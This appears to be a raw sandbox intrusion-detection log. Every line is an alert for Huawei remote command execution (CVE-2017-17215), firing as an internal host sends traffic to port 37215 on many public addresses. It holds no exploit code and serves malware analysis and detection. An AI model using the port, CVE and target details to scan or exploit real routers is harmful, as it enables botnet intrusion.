                                                    07/10/24-08:26:20.176669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896637215192.168.2.1445.38.104.24
                                                    07/10/24-08:27:33.980422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5938837215192.168.2.14197.210.194.52
                                                    07/10/24-08:26:25.438219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919037215192.168.2.14157.88.163.249
                                                    07/10/24-08:27:10.530292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926437215192.168.2.14197.165.89.245
                                                    07/10/24-08:27:11.494437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293037215192.168.2.1441.93.132.108
                                                    07/10/24-08:27:24.989466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449437215192.168.2.1441.110.21.73
                                                    07/10/24-08:26:55.313127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520437215192.168.2.14135.141.20.238
                                                    07/10/24-08:27:19.298148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5726437215192.168.2.14157.255.64.50
                                                    07/10/24-08:26:59.538381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5976037215192.168.2.1441.202.42.127
                                                    07/10/24-08:27:05.083830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4233837215192.168.2.14157.9.234.164
                                                    07/10/24-08:27:10.707207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5241437215192.168.2.14157.56.208.82
                                                    07/10/24-08:27:34.132992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120037215192.168.2.1441.156.250.16
                                                    07/10/24-08:26:31.076000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171037215192.168.2.1441.190.77.207
                                                    07/10/24-08:26:14.743404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626637215192.168.2.14197.184.181.226
                                                    07/10/24-08:26:55.369458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4900837215192.168.2.1451.55.237.176
                                                    07/10/24-08:26:42.380145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5795637215192.168.2.14157.80.209.66
                                                    07/10/24-08:27:32.607136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052037215192.168.2.14157.44.150.170
                                                    07/10/24-08:26:34.234468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492837215192.168.2.1498.240.146.153
                                                    07/10/24-08:27:14.837323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396837215192.168.2.14197.12.229.151
                                                    07/10/24-08:26:26.587363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838237215192.168.2.1441.224.57.52
                                                    07/10/24-08:27:02.923220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901237215192.168.2.14138.33.22.235
                                                    07/10/24-08:26:43.870524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4778237215192.168.2.14219.126.215.219
                                                    07/10/24-08:27:27.146425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379837215192.168.2.1441.58.10.233
                                                    07/10/24-08:26:22.217078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021437215192.168.2.1441.118.177.102
                                                    07/10/24-08:26:26.622039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514437215192.168.2.14157.189.148.40
                                                    07/10/24-08:26:29.869473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828037215192.168.2.14157.99.134.241
                                                    07/10/24-08:26:53.213910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5645837215192.168.2.14157.213.4.180
                                                    07/10/24-08:26:36.341806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560237215192.168.2.14157.136.123.208
                                                    07/10/24-08:26:23.340650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268437215192.168.2.14157.249.227.157
                                                    07/10/24-08:27:20.434935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5591237215192.168.2.14197.58.144.45
                                                    07/10/24-08:26:33.161951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3820237215192.168.2.14157.179.9.72
                                                    07/10/24-08:27:32.592657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3416637215192.168.2.14197.192.16.44
                                                    07/10/24-08:26:51.979400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4577237215192.168.2.14197.182.96.41
                                                    07/10/24-08:26:31.061341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3535637215192.168.2.14157.112.27.133
                                                    07/10/24-08:26:34.260119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4937637215192.168.2.14157.254.52.162
                                                    07/10/24-08:26:28.638597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.14157.22.52.89
                                                    07/10/24-08:26:42.407706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5263037215192.168.2.14121.118.219.93
                                                    07/10/24-08:27:23.831762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984237215192.168.2.14197.14.118.204
                                                    07/10/24-08:26:28.642982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794837215192.168.2.14197.166.186.52
                                                    07/10/24-08:27:19.163791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147237215192.168.2.1469.222.250.129
                                                    07/10/24-08:27:02.998271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357637215192.168.2.14157.229.194.230
                                                    07/10/24-08:26:14.814153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628237215192.168.2.1441.201.57.162
                                                    07/10/24-08:26:59.617070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021437215192.168.2.14157.250.105.241
                                                    07/10/24-08:26:31.102148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473837215192.168.2.14104.49.188.240
                                                    07/10/24-08:26:59.879798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3348237215192.168.2.1474.171.33.162
                                                    07/10/24-08:27:20.478787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5924837215192.168.2.14157.97.22.165
                                                    07/10/24-08:26:22.222070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5264037215192.168.2.14197.234.231.24
                                                    07/10/24-08:27:31.517899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3929037215192.168.2.14223.72.206.168
                                                    07/10/24-08:26:49.772453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3404237215192.168.2.1441.48.128.5
                                                    07/10/24-08:27:31.526473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056237215192.168.2.14157.32.1.202
                                                    07/10/24-08:26:38.569394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4707037215192.168.2.1441.247.66.46
                                                    07/10/24-08:26:45.653833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956837215192.168.2.1441.102.166.198
                                                    07/10/24-08:27:33.762956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4335237215192.168.2.14151.225.248.10
                                                    07/10/24-08:26:11.220716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5144437215192.168.2.14197.88.81.225
                                                    07/10/24-08:26:47.821657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381837215192.168.2.1441.95.229.177
                                                    07/10/24-08:27:27.155928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4159037215192.168.2.14157.89.144.91
                                                    07/10/24-08:26:41.485382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825237215192.168.2.14197.225.68.128
                                                    07/10/24-08:26:43.681419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869837215192.168.2.1441.25.64.88
                                                    07/10/24-08:27:27.063010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5449837215192.168.2.14157.182.240.118
                                                    07/10/24-08:27:13.965572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319237215192.168.2.1441.196.125.190
                                                    07/10/24-08:27:23.853234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714637215192.168.2.14157.227.56.161
                                                    07/10/24-08:26:49.853206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556637215192.168.2.14117.110.245.60
                                                    07/10/24-08:27:10.712804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857237215192.168.2.14157.23.246.83
                                                    07/10/24-08:26:14.829275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5094437215192.168.2.14116.30.65.113
                                                    07/10/24-08:27:34.126815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635037215192.168.2.148.232.43.43
                                                    07/10/24-08:26:52.022407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804437215192.168.2.1461.126.62.179
                                                    07/10/24-08:27:28.046169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5700637215192.168.2.14118.73.226.61
                                                    07/10/24-08:27:17.107350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3509837215192.168.2.1441.62.145.250
                                                    07/10/24-08:27:07.263619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4126637215192.168.2.14197.224.156.241
                                                    07/10/24-08:27:13.753461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669837215192.168.2.1441.185.195.152
                                                    07/10/24-08:27:22.806136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372637215192.168.2.1441.108.253.70
                                                    07/10/24-08:26:41.429574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4886237215192.168.2.14157.119.212.184
                                                    07/10/24-08:26:28.906271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895637215192.168.2.14191.35.149.90
                                                    07/10/24-08:27:24.896247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3444637215192.168.2.14197.246.105.156
                                                    07/10/24-08:26:38.621748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317637215192.168.2.1441.25.216.214
                                                    07/10/24-08:26:13.776398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331437215192.168.2.14113.87.153.122
                                                    07/10/24-08:26:14.819807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098837215192.168.2.14157.203.24.33
                                                    07/10/24-08:26:36.395697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689837215192.168.2.1425.195.89.152
                                                    07/10/24-08:26:22.232329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5712237215192.168.2.14139.23.100.222
                                                    07/10/24-08:27:17.102138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6016437215192.168.2.14202.131.177.231
                                                    07/10/24-08:27:19.184507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397037215192.168.2.1457.141.36.225
                                                    07/10/24-08:27:28.179861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3895437215192.168.2.14197.32.22.44
                                                    07/10/24-08:27:33.890908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4672037215192.168.2.14197.65.87.3
                                                    07/10/24-08:26:33.257380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4175437215192.168.2.14197.173.220.120
                                                    07/10/24-08:26:13.787067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4024037215192.168.2.14180.134.121.249
                                                    07/10/24-08:26:11.165821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376437215192.168.2.1417.179.142.78
                                                    07/10/24-08:26:23.280858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4758037215192.168.2.14157.157.177.101
                                                    07/10/24-08:26:36.442425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991237215192.168.2.14157.43.124.165
                                                    07/10/24-08:26:33.237564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128237215192.168.2.1441.14.60.148
                                                    07/10/24-08:26:42.433538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4687037215192.168.2.14157.11.104.140
                                                    07/10/24-08:26:13.824053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773637215192.168.2.14157.75.140.249
                                                    07/10/24-08:27:31.546205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4244237215192.168.2.1441.214.36.177
                                                    07/10/24-08:27:32.545496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4101037215192.168.2.1441.144.36.21
                                                    07/10/24-08:27:03.040762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3651037215192.168.2.14157.89.171.6
                                                    07/10/24-08:26:23.355278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432837215192.168.2.14116.125.115.146
                                                    07/10/24-08:26:51.950899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4074837215192.168.2.14209.239.121.53
                                                    07/10/24-08:27:30.556731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5647237215192.168.2.14196.120.92.145
                                                    07/10/24-08:27:07.381447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4206637215192.168.2.1441.21.251.0
                                                    07/10/24-08:27:19.293782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4726437215192.168.2.14197.125.56.165
                                                    07/10/24-08:26:53.245548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400237215192.168.2.14197.61.222.179
                                                    07/10/24-08:26:29.854453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199237215192.168.2.14197.38.187.100
                                                    07/10/24-08:26:33.182534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958237215192.168.2.14197.81.120.131
                                                    07/10/24-08:26:41.528829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869437215192.168.2.14101.196.183.217
                                                    07/10/24-08:26:20.137377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914237215192.168.2.1461.96.144.143
                                                    07/10/24-08:26:36.407750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435237215192.168.2.14157.33.239.230
                                                    07/10/24-08:26:42.404478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630837215192.168.2.14197.253.68.103
                                                    07/10/24-08:27:05.156196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5159837215192.168.2.14197.171.190.42
                                                    07/10/24-08:26:42.359553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3625437215192.168.2.1441.70.116.102
                                                    07/10/24-08:26:36.412614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446637215192.168.2.1447.209.104.112
                                                    07/10/24-08:26:52.008729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513637215192.168.2.14157.158.27.39
                                                    07/10/24-08:27:27.053819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841237215192.168.2.14223.252.235.232
                                                    07/10/24-08:26:34.210999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839837215192.168.2.1441.160.151.9
                                                    07/10/24-08:27:22.460068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821437215192.168.2.14157.54.96.161
                                                    07/10/24-08:26:36.420785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926837215192.168.2.1441.207.23.241
                                                    07/10/24-08:26:14.787511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487437215192.168.2.14157.41.201.162
                                                    07/10/24-08:26:22.298145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321037215192.168.2.14157.136.54.31
                                                    07/10/24-08:26:29.841336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4023437215192.168.2.14157.144.180.160
                                                    07/10/24-08:26:13.654312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722837215192.168.2.14130.143.57.173
                                                    07/10/24-08:27:03.002542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876437215192.168.2.14157.61.200.134
                                                    07/10/24-08:27:22.791681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4588637215192.168.2.14157.233.213.139
                                                    07/10/24-08:26:57.501573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133837215192.168.2.14171.221.13.158
                                                    07/10/24-08:27:20.492673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3614237215192.168.2.14175.72.48.248
                                                    07/10/24-08:26:20.128612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4733437215192.168.2.1441.253.212.41
                                                    07/10/24-08:26:59.879112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776037215192.168.2.1441.211.62.180
                                                    07/10/24-08:26:55.436206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4577037215192.168.2.1436.223.194.247
                                                    07/10/24-08:27:30.407360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849437215192.168.2.1441.23.236.142
                                                    07/10/24-08:26:47.827026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146837215192.168.2.14197.248.164.59
                                                    07/10/24-08:26:49.828645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5094037215192.168.2.1441.177.13.246
                                                    07/10/24-08:27:30.511682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784437215192.168.2.14157.242.144.63
                                                    07/10/24-08:26:22.291888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3955637215192.168.2.14136.188.209.118
                                                    07/10/24-08:26:17.951496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672037215192.168.2.14202.58.141.127
                                                    07/10/24-08:27:20.407026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341437215192.168.2.1485.151.248.103
                                                    07/10/24-08:27:32.526840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4241037215192.168.2.14125.144.250.234
                                                    07/10/24-08:27:05.200301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482037215192.168.2.14157.84.222.125
                                                    07/10/24-08:27:22.835700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058237215192.168.2.14106.25.11.166
                                                    07/10/24-08:26:11.583979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895437215192.168.2.1441.162.114.191
                                                    07/10/24-08:27:33.945203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600037215192.168.2.14148.53.4.169
                                                    07/10/24-08:26:15.849437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941437215192.168.2.14197.180.25.143
                                                    07/10/24-08:27:14.847892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912237215192.168.2.14197.109.43.157
                                                    07/10/24-08:26:14.732568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355437215192.168.2.14168.44.206.101
                                                    07/10/24-08:27:33.945203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422037215192.168.2.14157.232.7.227
                                                    07/10/24-08:27:08.339204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3936637215192.168.2.1441.209.71.75
                                                    07/10/24-08:27:23.911929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354037215192.168.2.14162.154.166.218
                                                    07/10/24-08:27:22.791682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4777037215192.168.2.144.47.239.119
                                                    07/10/24-08:26:28.935220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586637215192.168.2.14119.104.152.101
                                                    07/10/24-08:26:55.442446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177837215192.168.2.14205.136.24.105
                                                    07/10/24-08:26:38.641903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4787037215192.168.2.14157.169.255.247
                                                    07/10/24-08:27:02.887848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147637215192.168.2.14157.36.43.185
                                                    07/10/24-08:27:31.538711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664437215192.168.2.1441.9.175.249
                                                    07/10/24-08:27:13.931040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4723637215192.168.2.14157.41.94.15
                                                    07/10/24-08:26:29.821987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878837215192.168.2.1441.148.160.211
                                                    07/10/24-08:26:53.154328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970237215192.168.2.14162.185.212.16
                                                    07/10/24-08:26:57.667914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5694637215192.168.2.14157.162.147.139
                                                    07/10/24-08:26:57.516080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4693237215192.168.2.14157.11.142.229
                                                    07/10/24-08:26:43.624566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445237215192.168.2.14157.222.110.32
                                                    07/10/24-08:27:28.156684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3514437215192.168.2.1441.218.45.59
                                                    07/10/24-08:27:02.891587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135037215192.168.2.14197.130.77.176
                                                    07/10/24-08:27:23.971653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182237215192.168.2.14197.125.61.32
                                                    07/10/24-08:26:15.876796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3408037215192.168.2.14157.42.205.32
                                                    07/10/24-08:27:11.545525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484037215192.168.2.1441.129.176.19
                                                    07/10/24-08:26:36.357123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045237215192.168.2.1441.253.85.72
                                                    07/10/24-08:27:28.093264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5449037215192.168.2.1482.102.27.251
                                                    07/10/24-08:26:33.151266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806037215192.168.2.14185.246.128.69
                                                    07/10/24-08:27:07.290610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639637215192.168.2.1441.171.8.58
                                                    07/10/24-08:26:15.867032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668437215192.168.2.1441.34.176.150
                                                    07/10/24-08:26:48.000365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736437215192.168.2.14197.132.99.189
                                                    07/10/24-08:27:17.084345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5087237215192.168.2.14157.246.252.97
                                                    07/10/24-08:27:32.595538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946037215192.168.2.14197.97.130.150
                                                    07/10/24-08:26:11.514998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858837215192.168.2.14186.184.213.120
                                                    07/10/24-08:26:41.401211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3444237215192.168.2.1441.208.146.223
                                                    07/10/24-08:26:28.924774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3836437215192.168.2.14157.137.165.230
                                                    07/10/24-08:26:28.879483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020837215192.168.2.14157.155.80.153
                                                    07/10/24-08:26:43.932018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5210437215192.168.2.14157.145.228.238
                                                    07/10/24-08:26:11.658202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211237215192.168.2.14157.11.188.194
                                                    07/10/24-08:26:47.895563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3897637215192.168.2.14157.188.167.127
                                                    07/10/24-08:26:23.305980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4130037215192.168.2.148.58.70.71
                                                    07/10/24-08:27:19.336820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066237215192.168.2.14183.79.174.228
                                                    07/10/24-08:26:25.516790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359637215192.168.2.14157.157.63.57
                                                    07/10/24-08:27:14.828457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4733037215192.168.2.1489.75.144.89
                                                    07/10/24-08:26:38.520024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694237215192.168.2.1441.153.20.40
                                                    07/10/24-08:26:28.869440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4402837215192.168.2.1441.47.39.233
                                                    07/10/24-08:27:33.726260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5307237215192.168.2.14178.51.14.88
                                                    07/10/24-08:26:36.381629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4718437215192.168.2.14157.254.18.22
                                                    07/10/24-08:26:25.460773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5162637215192.168.2.14197.166.70.173
                                                    07/10/24-08:26:49.834879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390237215192.168.2.1453.142.239.45
